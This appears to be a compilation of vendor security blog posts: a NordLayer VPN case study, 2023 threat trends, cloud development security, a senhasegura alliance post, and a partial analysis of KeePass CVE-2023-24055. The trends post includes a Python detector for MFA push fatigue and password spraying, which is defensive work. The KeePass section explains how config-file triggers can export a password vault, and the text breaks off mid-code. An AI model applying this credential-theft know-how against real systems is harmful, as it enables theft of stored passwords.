How Board of Innovation manages security to protect its teamwork & client data

Board of Innovation is a global innovation firm imagining tomorrow’s products, services, and businesses – and creating them today. The company joins forces with the world’s most ambitious businesses to make what life needs next.

Working with prospects and new ideas requires creative flexibility that the company does not want to block with security restrictions. On the other hand, protecting business and client data remains one of the company's top priorities. Mehdi Lahmamsi Pinel, Global Operations & IT Manager at Board of Innovation, explains how he balances these two equally important goals against today's cyber threats, and what the right security approach looks like for such a company.

The challenge

Trust over control within client confidentiality

The company culture at Board of Innovation is based on trust and employee enablement. These are critical elements in a creative industry. To succeed, the company is remote-first, and collaboration with freelancers and consultants of different backgrounds supplements full-time employees to generate new kinds of products and services.

“The Board of Innovation team is diverse, as we have around 100 people of about 30 different nationalities in 60 places spread across cities, countries, and continents.”

Yet, with a dynamic network of company innovators, consultants who move to client facilities, and third-party partners, IT managers face many challenges maintaining high levels of security that don’t interfere with team workflow.

“Business with client companies makes data security and confidentiality imperative, balancing it with the IT Manager’s responsibility to ensure the team works efficiently and effectively.”

Board of Innovation works with high-profile companies and industry leaders. A constant turnover of projects, collaborators, and partners also requires close oversight to keep the risks in check.

Since employees are free to choose how they work, the whole organization has to be security-aware for the security goals to be met. But how does one define appropriate data protection standards and make security implicit rather than dominant? It is a tough and subtle challenge for the IT manager to tackle.

The solution

Defining the security minimum

After evaluating the team setup, work environments, and the need for flexibility, a VPN solution was the most straightforward tool for Board of Innovation, as it supports several of the security policies defined in the company. One of those policies is establishing a secure connection to the company network, and this is where NordLayer comes into play.

A newly assigned IT manager started by reviewing the cybersecurity strategy then in place. Board of Innovation already had an ongoing NordLayer subscription, deployed by the previous manager responsible for IT, but it needed a strategy that fitted the company culture and turned it to the company's benefit.

“I’ve started by revisiting and improving the existing cybersecurity setup. NordLayer was there but not utilized to its fullest potential.”

So what needed to be added to create a sound cybersecurity strategy that works?

The company has a secure network access solution in place. Connecting through the VPN, so that traffic is encrypted, is mandatory, and every organization member has to read and agree to the data protection policies.

“Whether our collaborators and employees use personal or corporate devices for the job, they must acknowledge internal IT security policies to follow.”

Board of Innovation follows a streamlined approach to managing its workforce: company policies define the access levels to internal data. To put those policies into force, corporate devices became the connecting point for every user with access to company resources.

“Mandatory apps like NordLayer and tools for password management, specific internet navigation, and work organization are pre-installed by default. That’s how we enforce security via device management on corporate devices.”

Having the tools that fulfil the internal and client data security requirements pre-installed means the security manager no longer depends on each employee to set them up correctly. Getting those corporate devices configured and into the hands of the workforce is half the job done.

Users have to launch the VPN whenever they connect from an untrusted network, wherever and whenever they work, and the admin can verify from the management side that the rules are being followed. The VPN protects the traffic in transit; keeping the device itself compliant remains the job of the pre-installed device management tooling.

Why choose NordLayer

Creative freedom and trust are the foundation of the Board of Innovation culture. Thus, any tools and solutions used to keep up with the security requirements must be convenient and simple, enabling and not disrupting the workers.

The organization decided to keep the NordLayer solution because of its user-friendliness, and because a well-known provider has a reputation to uphold as a vendor of a safe and efficient solution.

Role and endpoint management adds further protection for the company's digital assets by enforcing authenticated user identities, and more granular network access segmentation allows closer supervision of what each organization member can reach.

How NordLayer enables data security on different network layers

Systems and policies let the IT manager achieve consistency in business processes and operations. The overview on the NordLayer dashboard makes it easier to see who complies with the rules, for example who has 2FA enabled, and to pull a report of the connection history.

The outcome

Streamlined consistency aligned with internal policies 

Now, Board of Innovation has its entire workforce onboarded to the NordLayer solution. Having the solution present on every corporate device, combined with two-factor authentication, makes it easier for the IT manager to ensure that policies are actually being applied.

“We distribute NordLayer licenses to all organization members and contributors as a basic rule in our company. We aim to reinforce security policies in as many places as possible.”

The remote network access solution enables the organization to collaborate with various clients, partners, and freelancers. Managing access to internal resources and project information puts barriers in the way of data leaks and breaches. Just as importantly, the security policies do not get in the way of the innovators' creativity and workflow.

“Using NordLayer is so easy — simply open the user interface, choose a gateway, get connected, and here you go.”

All that is left for the IT manager is to distribute access and privileges to internal resources according to the company policies and check that everyone follows the process.

Pro cybersecurity tips

Sharing best practices helps businesses in any industry find their own way of doing security. A strategy for protecting the company network and information of different sensitivity levels can be built on surprisingly unconventional advice. So, as every time, we asked Mehdi Lahmamsi Pinel, Global Operations & IT Manager at Board of Innovation, to share his professional insights on business cybersecurity:

Have you ever hesitated to impose security policies because they might overburden business operations and disrupt employees' daily work? Creative freedom and simplicity can remain the priority: cybersecurity does not have to be dominant to be effective and efficient.

The NordLayer solution secures and enables every way of working, even if you want to prioritize trust and flexibility. The application runs in the background, encrypting connections and segmenting the teams wherever the employees are. Organization-provided devices can be combined with personal endpoints, which makes a BYOD policy workable within the company, and IT managers can get on with their work. Sounds good? Reach out to learn more about NordLayer possibilities.

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About NordLayer
NordLayer is an adaptive network access security solution for modern businesses – from the world’s most trusted cybersecurity brand, Nord Security.

The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.

Top cybersecurity trends to be on the lookout for in 2023

Much like seasonal flu, cyber threats evolve every year. While the coronavirus curve has, for the most part, been flattened and more enterprises have reopened their offices to on-premises employees, the number of cyberattacks continues to grow: cyberattacks increased by 38% in 2022 compared with 2021.

Even without Covid as a catalyst, businesses keep becoming more digital, which brings more attacks. In this environment cybersecurity is a real challenge, and both business managers and network administrators have a real head-scratcher on their hands. Here are our predictions on the cybersecurity trends for this year.

Cybersecurity is no longer only an IT manager's concern. It comes into play when key business decisions are made. Data breaches can turn a business upside down with penalties and loss of customer trust, and the threat can come from outside as well as from inside, for example through improperly configured networks.

As digital transformation is becoming more prevalent among businesses, so does the increase of various threats. Here are the eight main cybersecurity trends shaping this year’s digital environment.

ChatGPT-enabled attacks

Soon after OpenAI launched the ChatGPT chatbot, it became clear that it could do more than form responses across many knowledge domains. Cybercriminals have already started using it to help build hacking tools, while scammers are gathering knowledge to build similar chatbots for impersonation.

While the publicly available ChatGPT-written tools are quite rudimentary, it seems only a matter of time before attackers turn the AI to their advantage. At the very least it lowers the entry threshold by being a huge help to novice malware developers, and even without coding assistance it helps attackers write genuine-sounding phishing emails.

Although ChatGPT has various safeguards to prevent it from being used for exploitation, this is something that businesses should keep in mind. Artificial intelligence is going mainstream which levels the playing field for hackers and can put increased pressure on your cybersecurity plan.

Remote and hybrid workforce risks

After the pandemic, businesses have settled on hybrid workforce models. In some cases, these models are relics of the period when the Covid-19 outbreak forced a digital transition. Because that transition had to happen very quickly without interrupting business operations, the security measures were not always free of gaps.

This blend of on-premises employees, remote contractors, and the wide variety of company-issued and personal devices they use makes securing everything a colossal job. For IT administrators, the attack surface is too large to oversee everything that is happening. As data breach cases pile up, we will likely continue to see increased interest in securing business networks while preserving workplace flexibility.

Automation of cybersecurity

As attackers start to leverage AI for their exploits, it is only natural for businesses to keep up. Data sources multiply quickly, so automation is needed to process the volume before humans analyze it. This lets companies get the best of both worlds and substantially improve their security posture.

Various sources show that successful AI pairings can extend network visibility by up to 35%. These developments clearly show that AI has the potential to be a key component when transforming network security operations. Leveraging machine learning moves organizations forward and builds more sophisticated systems to withstand the most complex online threats.

International state-sponsored attacks

While state-sponsored cyberattacks are nothing new, the ongoing war in Ukraine marked a turning point and a steep increase. Russia remains largely isolated from the Western world, and 64% of Russian hacking was directed at Ukraine. These are huge numbers even without counting attempts against its allies. Cyber espionage is escalating elsewhere too, as the recent shoot-down of the Chinese surveillance balloon by the US showed.

As all this is happening, a business can easily be caught in the crossfire. This makes private companies and critical infrastructure organizations prime targets for credential theft, vulnerability exploitation, or ransomware. In such a climate, not having a cybersecurity plan in place is a severe liability, and businesses will likely take action to address IT security shortcomings.

Building a security-aware culture

According to Verizon, 85% of breaches involve a human element, so investing in cybersecurity technologies but skimping on the workforce is missing the forest for the trees. In today’s climate, thinking that cybersecurity risks are a problem for the IT department can blow up when you least expect it. Every single employee must be aware of potential cyber risks and know how to deal with them.

In some cases this may require writing transparent information security policies; in others, security awareness training. Building a security culture will be a key factor in many organizations this year. As social engineering attacks are not subsiding, they cannot be countered without the company culture on board.

Data breaches will continue to increase

The number of data breaches grows every year, and this year will be no exception. Data is still one of the most valuable assets, and organizations still leave attackers plenty of gaps in the fence to exploit. Building a firm infrastructure is neither cheap nor simple, so many companies carry on hoping they will not be the next target.

That said, prevention is much more effective (and cheaper) than settlements, lawsuits, and fines for data security violations. Yet many businesses still rely on legacy software without updating their risk management policies and procedures. We can expect more businesses to be caught off guard this year, while others will try to learn from others' mistakes rather than their own.

Global recession serves as a catalyst for hackers

As many experts warn of an economic downturn, this can catalyze cybercrime. Most cyberattacks are financially motivated, so when the economy shrinks because of global geopolitical events like Russia's war in Ukraine, the shockwave reaches all spheres of life. Hacking can become a lucrative option for someone who has the skills and no other way to earn a living wage.

Hackers-for-hire may therefore emerge in search of easy money, with potentially devastating consequences for companies. While some might perform penetration tests or collect bug bounties, others may not be so ethical. This deserves attention, especially in Europe given its geopolitical tensions.

Credential stealing will continue to rise

Various reports show that attacks targeting credentials on mobile devices are on the rise. Attackers know that employees use their personal mobile and IoT devices to access the company network. Because those devices are user-managed rather than centrally patched, they tend to carry more vulnerabilities that attackers can exploit.

What also helps attackers is that most systems are still protected only with passwords. Such a setup is especially easy to crack when employees reuse the same passwords. The move towards passwordless authentication or hardware identity tokens is happening slowly, which leaves a lucrative window for credential thieves. Some experts also expect more second-factor bypasses this year against SMS-based and push-based multi-factor authentication, for example by intercepting SMS codes or bombarding a user with push prompts until one is approved.
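The two credential-attack patterns just described leave recognisable traces in authentication logs. The following Python is an added example, not NordLayer's or any vendor's code; the log format, event names, usernames and IP addresses are constructed for illustration. It flags MFA push fatigue (a burst of push prompts for one user, some denied or timed out, ending in an approval) and password spraying (one source address failing logins against many different accounts within a short window, which keeps per-account lockout counters low).

```python
"""Flag MFA push fatigue and password spraying in authentication logs.

Added example; the log format, event names and addresses are constructed,
not taken from NordLayer or any real system.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log. Each line: <ISO timestamp> <source_ip> <user> <event>
SAMPLE_LOG = """\
2023-03-01T08:00:01 203.0.113.10 alice LOGIN_FAIL
2023-03-01T08:00:03 203.0.113.10 bob LOGIN_FAIL
2023-03-01T08:00:05 203.0.113.10 carol LOGIN_FAIL
2023-03-01T08:00:07 203.0.113.10 dave LOGIN_FAIL
2023-03-01T08:00:09 203.0.113.10 erin LOGIN_FAIL
2023-03-01T08:00:11 203.0.113.10 frank LOGIN_OK
2023-03-01T09:10:00 198.51.100.7 alice LOGIN_OK
2023-03-01T09:10:02 198.51.100.7 alice MFA_PUSH_DENIED
2023-03-01T09:10:20 198.51.100.7 alice MFA_PUSH_DENIED
2023-03-01T09:10:41 198.51.100.7 alice MFA_PUSH_TIMEOUT
2023-03-01T09:11:05 198.51.100.7 alice MFA_PUSH_DENIED
2023-03-01T09:11:30 198.51.100.7 alice MFA_PUSH_APPROVED
2023-03-01T12:00:00 192.0.2.44 bob LOGIN_OK
2023-03-01T12:00:03 192.0.2.44 bob MFA_PUSH_APPROVED
"""


def parse_log(text):
    """Parse the constructed format into (timestamp, ip, user, event) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, user, event = line.split()
        events.append((datetime.fromisoformat(ts), ip, user, event))
    return events


def detect_push_fatigue(events, window=timedelta(minutes=5), min_prompts=3):
    """Return (user, prompts_in_window, refused) for each user whose MFA push
    approval was preceded, within `window`, by at least `min_prompts` prompts
    of which at least one was denied or timed out: the push-bombing signature."""
    prompts_by_user = defaultdict(list)
    for ts, _ip, user, event in events:
        if event.startswith("MFA_PUSH_"):
            prompts_by_user[user].append((ts, event))
    hits = []
    for user, prompts in prompts_by_user.items():
        prompts.sort()
        for i, (ts_i, event_i) in enumerate(prompts):
            if event_i != "MFA_PUSH_APPROVED":
                continue
            recent = [e for t, e in prompts[: i + 1] if ts_i - t <= window]
            refused = sum(1 for e in recent if e != "MFA_PUSH_APPROVED")
            if len(recent) >= min_prompts and refused >= 1:
                hits.append((user, len(recent), refused))
                break  # one finding per user is enough for an alert
    return hits


def detect_password_spray(events, window=timedelta(minutes=10), min_users=5):
    """Return (ip, distinct_users) for source addresses whose failed logins
    hit at least `min_users` different accounts inside `window`. Spraying
    keeps per-account failures low, so the pivot is the source, not the user."""
    fails_by_ip = defaultdict(list)
    for ts, ip, user, event in events:
        if event == "LOGIN_FAIL":
            fails_by_ip[ip].append((ts, user))
    hits = []
    for ip, fails in fails_by_ip.items():
        fails.sort()
        start = 0
        for end in range(len(fails)):  # sliding window over sorted failures
            while fails[end][0] - fails[start][0] > window:
                start += 1
            users = {u for _, u in fails[start : end + 1]}
            if len(users) >= min_users:
                hits.append((ip, len(users)))
                break
    return hits


def analyze(text=SAMPLE_LOG):
    """Run both detectors over a log and return the findings by category."""
    events = parse_log(text)
    return {
        "push_fatigue": detect_push_fatigue(events),
        "password_spray": detect_password_spray(events),
    }


if __name__ == "__main__":
    for kind, findings in analyze().items():
        print(kind, findings)
```

On the constructed log this reports alice as a push-fatigue victim (five prompts in the window, four refused before the approval) and 203.0.113.10 as a spraying source (five accounts failed within ten seconds). The thresholds are starting points; tune them against your own baseline of legitimate retries before alerting on them.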

Tips on how to prepare your business for 2023

To prepare for this year, companies should start with budgeting. The amount spent on cybersecurity in 2021 and 2022 is a useful benchmark for the 2023 budget, adjusted for how many significant changes occurred in the organization and in the cybersecurity landscape.

Adjusting the cybersecurity budget to the company size is also common. A frequently quoted rule of thumb is to allocate around 10-20% of the IT budget to security. Revising the plan as you go is always a good idea: the threat landscape can change a lot within a year, so staying flexible is one way to stay ahead of the curve.

How can NordLayer help to protect your business in 2023?

The most recent developments in cyberspace are relevant to every business, since most will be affected by them. As threats keep piling up, organizations need trustworthy allies to deter them.

A modern remote network access solution like NordLayer integrates threat, network, and security management centrally and provides a range of features targeted at specific issues, with a design that combines a cloud-based platform, data privacy protection, and access control.

NordLayer covers security with a centralized control interface and integrates with existing infrastructure. It provides secure remote access for hybrid environments and implements zero trust for distributed workforces, with the control plane delivered from the cloud.

Achieve multilayered protection for your network and data environment: secure your business in 2023 with NordLayer. Reach out to talk more.

Software development in the cloud: benefits & challenges

Digital transformation has touched most businesses operating today, and the transition to the cloud is an important step in it. The cloud has become the primary environment for creating new software, particularly for software developers and IT professionals, because it combines flexibility and efficiency at a reasonable price.

Yet not everything is moonlight and roses: the outsourced model also brings its fair share of cybersecurity risks. This leaves network administrators and developers with the problem of balancing the benefits against the risks, so that the resulting way of working is as secure as it is effective. Let's take a deep dive into cloud software development.

What is cloud computing?

Cloud computing is an infrastructure model in which computing resources and processes are provided by external data centers rather than run internally. Delivery relies on the public internet, which allows a much wider reach than conventional methods.

Cloud computing often provides services like data storage, management, device access, networking, and cybersecurity. Externalizing these operations to cloud-based infrastructure allows businesses to focus their efforts elsewhere. In addition, this also enables them to flexibly adjust their operations according to their needs allowing them to be changed at a moment’s notice. It’s a key driving force behind the startup culture and innovations.

Service models

Reliable, fast, and secure services are what every customer takes as a baseline. Businesses are pressed to deliver on the highest level at all times. However, IT infrastructures can’t always stretch that fast, nor can every business owner issue blank checks for upgrades.

Cloud computing solves these pressing issues by providing a streamlined model delivered via the internet. According to specific business requirements, cloud computing services are classified into three distinct models.

Software as a Service (SaaS)

SaaS is primarily used for delivering web applications. Fully managed by the service provider, the software is accessed remotely and typically priced by plan or subscription. In most cases this is much cheaper than managing the software internally, and it relieves the team of maintenance work.

Platform as a Service (PaaS)

PaaS offers a remotely accessible environment in which developers build and deliver software applications. It removes the need to provision and maintain the underlying servers, operating systems, and middleware, which are expensive and laborious to set up and run. The model includes everything you need to start working on your applications. PaaS uses the same pay-as-you-go model as the other cloud service models.

Infrastructure as a Service (IaaS)

IaaS offers core computing resources such as servers, storage, and networking on demand. It lets a company adjust its resources as needed: when new applications launch, they can be provisioned quickly, and the reliability of existing infrastructure can be extended. You usually pay per resource consumed and install and manage your own software on top.

Cloud deployment models

The cloud services deployment model may also have various distinct particularities like ownership, scale, access rights, etc. It defines the location of the servers your organization will be using, what can be changed, and the needed input from the client. This distinguishes different cloud deployment types.

Public cloud

As the name suggests, the public cloud is available for anyone to use. It is multi-tenant, owned and managed by the cloud service provider, and requires little maintenance from the customer. The customer also has the least control over the underlying infrastructure and is responsible for correctly configuring everything built on top of it, which is where many public cloud security failures originate. Some public clouds are free to use, while others require a subscription beyond the basic plan.

Private cloud

The polar opposite of the public cloud is the private type: it is reserved for a single organization on dedicated hardware. Often incorporated into the organization's own infrastructure, the private cloud keeps all the hardware and software services within its perimeter. It offers the most flexibility of all the cloud types, allowing an organization to customize even the smallest aspects of the setup.

Hybrid cloud

The hybrid model combines private and public cloud features, usually through orchestration software that spans both. Sensitive applications can be hosted in the private environment while less sensitive or bursty workloads use the cheaper public cloud. In a way, it functions like a partially locked public cloud with many more customization options.

Benefits of software development in the cloud

If your business rapidly expands, cloud technology is a natural addition to improving your operations. This allows you simultaneously to improve productivity and give more opportunities for your internal teams. Here is a list of the principal benefits related to cloud computing.

1. Scalability

Traditional server hosting always ran into constraints because it was based on physical hardware: capacity could only be proportional to your internal server stack. Cloud computing turns this premise on its head and removes most of those constraints. Whatever the organization's size, it is possible to find an option to fit its budget.

When more capacity is needed, allocating more servers and combining their processing power is easy. Providers also offer flexible memory and CPU adjustments, so the setup can be customized down to the smallest detail.

2. Cost-efficiency

For businesses looking to test the waters before committing to full-scale infrastructure, the cost efficiency of the cloud model is the key benefit. Unlike hosting everything internally, the cloud needs little upfront investment, making it a good starting point from which usage can grow as needed.

Pricing-wise, cloud service providers widely adopt pay-per-usage fees, meaning that organizations are only charged for the resources they use. This means it’s much more convenient to manage overspending and provides a safety net if the operations need to be quickly shrunk. 

3. Disaster recovery and redundancy

Whichever method of application and data hosting a business chooses, emergency data recovery will have to be set up. Cloud services make this much easier, as they come with data mirroring and backup options out of the box.

Traditional on-premises setups have to be configured from the ground up, which very likely means additional investment. Mirroring within the internal perimeter also does not help if the whole network becomes infected, since the backup could be damaged as well. The same caveat applies to cloud backups that are reachable with the same credentials as production, so they should be kept in a separate account or made immutable. Handled that way, disaster recovery is one of the biggest advantages of cloud computing.

4. Fast provisioning of resources

Relying only on the on-premises resources currently available leaves companies with a limited pool. Software development and test environments require thorough planning in advance and take a while to get running. With the cloud model, they can be available almost instantly.

Brand-new environments for testing or development can be created on demand, which speeds up cloud software development by skipping the preparation steps. The cloud provider also keeps its platform up to date, so the application can be integrated with new technology as it becomes available.

5. Multiple models and offerings

The cloud model is less restrictive and doesn’t operate in one-size-fits-all absolutes. By design, it’s flexible and aims to adapt to accommodate the organization’s needs, not the other way around.

On average each provider has several options to choose from, and most allow even greater personalization for an extra fee. As mentioned previously, internal and outsourced cloud infrastructure can also be combined into a hybrid approach if that is the direction a business wants to take.

6. Wide geographic reach

Unlike on-premises hardware, cloud-based infrastructure has a much wider reach. This helps when connecting a globally distributed workforce and reaching customers; the latter benefits from spreading the server load across the cloud architecture.

Even if an application is hosted in a single location, a distributed cloud model allows users to easily access it through multiple points of presence scattered around the globe. This is further facilitated by content delivery networks allowing instant access to various resources and services.

7. Easy deployment

The innate flexibility of cloud infrastructure brings easy deployment. In practice, some operations can be automated by integrating cloud processes into your existing setup, which can significantly speed up application testing.

At the same time, this lets a business speed up cloud software development with instant updates to testing environments. If everything works well, the testing and production slots can simply be swapped. This works wonders for testing new features and ensuring upgrades work as intended before they are released to the public.

Possible challenges of cloud software development

While it opens many doors, cloud software development is not without its challenges. Outsourcing can be difficult, especially for companies with a system that already works. Here are the major challenges facing cloud application development.

Seamless interoperability

The major challenge for organizations considering cloud frameworks is interoperability. The code needs to work with multiple cloud providers despite their differences, and it gets more complex still when portability is involved: the same code can be difficult to move from one environment to another.

This needs to be addressed by introducing standards and facilitating data access across different software platforms. For this reason, operating protocols must be highly standardized to avoid potential interoperability errors.

Performance issues

When we talk about the cloud, we are still talking about physical servers, only distributed ones. Their physical location still matters, and the customer's connection to them affects the experience.

Therefore it’s important to prepare in advance and figure out which data centers will be hosting your data. It will be much easier to set everything up correctly in advance rather than to plan the move once the operations are up and running. End-to-end testing is critical. Cutting corners will result in an inefficient mechanism that hurts your company in the long run. 

False promises of scalability

While all cloud providers offer scalability, it is still bounded by the provider's capacity. Scalability is always limited to the resources a provider has, so if your scaling needs exceed what the provider can deliver, you may be stuck with a service that does not cover them.

The key risk here is choosing a predefined plan that is not flexible enough for your needs. In some cases a hybrid model gives the best of both worlds.

Reliability and availability

While the cloud model helps keep uptime high for cloud apps, it is not a guarantee. Not every provider or plan includes around-the-clock support, so outages can go unresolved for longer than you would like, and providers do not always communicate maintenance schedules or other problems proactively.

This requires extra effort on the client's side: the cloud service should be monitored with additional tools, so that service usage and performance are known at all times.

Dependency on the provider

When building applications, it is very convenient to tailor-make the code to work best within its cloud environment. However, this also has the side effect of making your operations heavily reliant on the external partner. Changing the provider can be expensive, time-consuming, or technically difficult.

Your services should follow good architecture practices so that they are not entangled with the underlying provider’s service logic if the business decides to move operations elsewhere. For developers, this means understanding the particularities of different protocols and adjusting application behavior responsibly.

Programming modes

Developing applications in the cloud requires different programming skills. While most developers are familiar with SQL operations that pass application-specific functions to federated data sources, cloud software development doesn’t work the same way. It requires developers to adopt query-oriented processing that derives federated data sets by performing complex queries or function compositions, which align better with cloud computing models.

Application security

Outsourcing such critical elements as application software development means access to them should be heavily restricted. This makes application security a challenge because of the web delivery model and the state of browsers.

For this reason, connections outside the browser must be properly secured using encryption and tunneling protocols. Still, this is a broad topic that deserves to be addressed separately.

What measures should developers take to secure software in the cloud?

Moving development workflows to the cloud is one of the most important moves a company can make. While it provides various benefits for developers, security is one of the most important concerns related to it. Here’s how it can be improved.

1. Establish governance policies

Clearly defined governance policies help to achieve better security in cloud software development operations. They put procedures and policies in place and give employees clear guidance in the workplace.

When aligned with your company’s internal security requirements, these policies create a holistic system defining organization-wide operational standards. This evens out security across the board and creates transparent processes.

2. Segment your network

The architectural approach of dividing networks into smaller segments helps to manage various security risks in case of a data breach. Because free lateral movement across the network is restricted, attackers are confined to a subnet, which limits how far and for how long they can operate undetected before staging an attack.

Resources can be shared between segments, so no additional processing power is needed. Beyond its security benefit, this approach allows traffic flow between subnets to be controlled with granular policies.

3. Automate security processes

Security automation is an essential component of a solid cloud software development operations model. Code analysis can be automated during the build and test phases, while infrastructure-as-code practices can automate configuration management. Finally, various potential threats can be responded to instantly without human intervention, preventing potential damage.

4. Conduct vulnerability management

Identifying, evaluating, and reporting security vulnerabilities is a critical procedure, paramount to secure cloud software development. Applications should not be delivered to the customer while they have unresolved known vulnerabilities; otherwise, attackers could easily exploit them. Penetration testing is therefore needed to better assess potential exploits and address critical application shortcomings.

5. Regularly audit security

Organizations’ security practices should match their policies; if the two don’t align, this invites a cybersecurity incident. Periodic evaluations of security practices should be one of the pillars of the cybersecurity strategy. Improvements should also be considered, which helps to set benchmarks and measure progress.

How NordLayer can help secure the cloud

As the cloud-first approach is a firmly established way of organizing infrastructure among modern businesses, its security is one of the most important disciplines of modern cybersecurity. Application software development relies heavily on cloud computing to do the heavy lifting, but this must always be done securely.

NordLayer offers cloud-native tools incorporating ZTNA practices within a Security Service Edge model. Allowing secure remote access by encrypting traffic end to end protects data whether it’s hosted locally or in the cloud.

Features like IP allowlisting enable network administrators to approve authenticated connections and block everything else. This helps to create an airtight system that provides a secure access model when using external cloud services.

Get in touch with the NordLayer team and explore our cloud-based products today.

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About NordLayer
NordLayer is an adaptive network access security solution for modern businesses – from the world’s most trusted cybersecurity brand, Nord Security.

The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.

senhasegura’s participation in the ISA Global Cybersecurity Alliance

senhasegura and ISA Global Cybersecurity Alliance

The topic of cyber threats is becoming increasingly present on the agendas of organizations of all sizes and verticals. With the intensification of the digital transformation movement through the introduction of technologies such as 5G and the Internet of Things, ensuring the protection of infrastructure will be an even greater challenge for organizational leaders.

Among the preferred targets of malicious attackers are organizations that use Industrial Control Systems (ICS). ICS process critical data and are responsible for the functioning of sectors such as telecommunications, logistics, energy generation, and healthcare. These sectors are a vital part of countries’ economies, forming part of what we call critical infrastructure. According to a Kaspersky study, during the second half of 2021, almost 40% of industrial devices were targeted at least once. These attacks bring significant consequences not only for these organizations but for society as a whole.

One of the biggest examples of the damage that attacks on this type of organization bring occurred in 2017. That year, Maersk, a logistics giant, fell victim to the NotPetya malware, a virus with high propagation and destruction capacity that encrypted its data. The attack caused infected devices to simply stop working, affecting the continuity of its operations and bringing revenue losses.

In addition, various governments around the world have shown concern about the impact associated with cybersecurity, especially those linked to critical infrastructure. This has caused an increase in the activity of regulating how companies implement appropriate cybersecurity controls in industrial environments.

As part of the effort to ensure the cybersecurity of control and automation systems, the International Society of Automation (ISA) developed the 62443 series of standards. These standards are internationally recognized and have been adopted by the International Electrotechnical Commission and the United Nations. The ISA 62443 standards define requirements and procedures for the implementation of secure industrial automation and control systems, as well as best security practices for these systems. The adoption of the ISA 62443 standards allows industrial organizations to address the challenges related to the cybersecurity of their systems and eliminate the gaps between operations and Information Technology in their infrastructure.

Moreover, with the aim of increasing awareness and protection capability of ICS in industrial and critical infrastructure installations and processes, ISA created the Global Cybersecurity Alliance (GCA). The cybersecurity alliance created by ISA brings together automation and system control providers, IT infrastructure suppliers, service providers, system integrators, and end-users to address threats to ICS together.

ISAGCA also works to stimulate the adoption of the ISA 62443 standards, which allows for increased awareness, knowledge sharing, and tool development to assist organizations in implementing the entire cybersecurity protection lifecycle. ISAGCA members are also committed to working together with government agencies, regulators, and other stakeholders around the world.

ISAGCA members include leading technology and industrial application providers, among which is senhasegura. senhasegura’s participation in ISAGCA since its foundation allows for the application of our experience in protecting privileged access to achieve the alliance’s objectives, especially those related to ICS protection. senhasegura’s participation in the alliance also allows for identifying gaps, reducing risks, and ensuring that member companies have the appropriate tools to protect their infrastructure from malicious attacks.

All of these aspects also show the commitment of the entire senhasegura team and ISA to the effective security of industrial environments, as well as the importance of advancing together to ensure the application of these standards, methods, and best practices for the protection of industrial systems. In this way, it is possible to ensure not only the security of organizations but of society as a whole.

About Segura®
Segura® strives to ensure the sovereignty of companies over actions and privileged information. To this end, we work against data theft through traceability of administrator actions on networks, servers, databases and a multitude of devices. In addition, we pursue compliance with auditing requirements and the most demanding standards, including PCI DSS, Sarbanes-Oxley, ISO 27001 and HIPAA.

KeePass Passwords Theft CVE-2023-24055

Introduction

CVE-2023-24055 is a vulnerability discovered in KeePass version 2.53. The vulnerability allows an attacker with write access to the XML configuration file on a system to steal vault credentials. KeePass is a widely used free, open-source password manager that stores sensitive information locally, providing some advantages over cloud-based options and making it user-friendly.

Set Up The Environment

  1. Install KeePass v2.53 from the archive site with the default installation configuration, then create a database file and set the master key so that it is ready, as in the following picture.

  2. For the attacker machine, I recommend using Kali Linux, which can be downloaded from the official Kali website. In this scenario, the victim machine will be running Windows 10. We will also use tools like Burp Suite as an HTTP proxy to inspect the traffic.

Dynamic Analysis

Based on this PoC, the attack vector is through the configuration file located at C:\Program Files\KeePass Password Safe 2\KeePass.config.xml, using the Trigger feature.

To explore this feature, let’s take a look at the options toolbar in the KeePass application.

Navigate to Tools > Triggers..., as shown in the following picture:

The interesting thing here is that Triggers are enabled by default in KeePass, and there is an ‘Initially on’ option that causes the trigger to run every time KeePass starts. This gives an attacker the advantage of running the trigger without having to enable it manually, and there are further customizable options available, such as Event, Condition, and Action.

By looking at each option in more detail, I realized that there were numerous options that could be used for malicious purposes, such as the Application started and ready event. Attackers could exploit this option by using it as an event to trick victims into opening the application and initiating the trigger feature to export data and carry out malicious activities.

The Action option is used to perform specific tasks based on the specified Conditions and Events. These tasks can include executing command lines or URLs and exporting the active database, which can be risky for the user. An attacker can use these options to perform malicious actions, as demonstrated in the PoC.

Static Analysis

The app is developed in C#, so it would be easy to reverse the code, but we don’t need to because it is open source; everything we need is in this repo:

The vulnerability, which allows password theft, is caused by the app’s default policy, which doesn’t require the user to enter their master key every time they export their password database. This behavior is controlled through the app policy, which is applied in the ExportUtil.cs file by the following code:

public static bool Export(PwExportInfo pwExportInfo, FileFormatProvider fileFormat,
	IOConnectionInfo iocOutput, IStatusLogger slLogger)
{
	if(pwExportInfo == null) throw new ArgumentNullException("pwExportInfo");
	if(pwExportInfo.DataGroup == null) throw new ArgumentException();
	if(fileFormat == null) throw new ArgumentNullException("fileFormat");

	bool bFileReq = fileFormat.RequiresFile;
	if(bFileReq && (iocOutput == null))
		throw new ArgumentNullException("iocOutput");
	if(bFileReq && (iocOutput.Path.Length == 0))
		throw new ArgumentException();

	PwDatabase pd = pwExportInfo.ContextDatabase;
	Debug.Assert(pd != null);

	// The export policy check: if ExportNoKey is set, the master key is not asked for again
	if(!AppPolicy.Try(AppPolicyId.Export)) return false;
	if(!AppPolicy.Current.ExportNoKey && (pd != null))
	{
		if(!KeyUtil.ReAskKey(pd, true)) return false;
	}
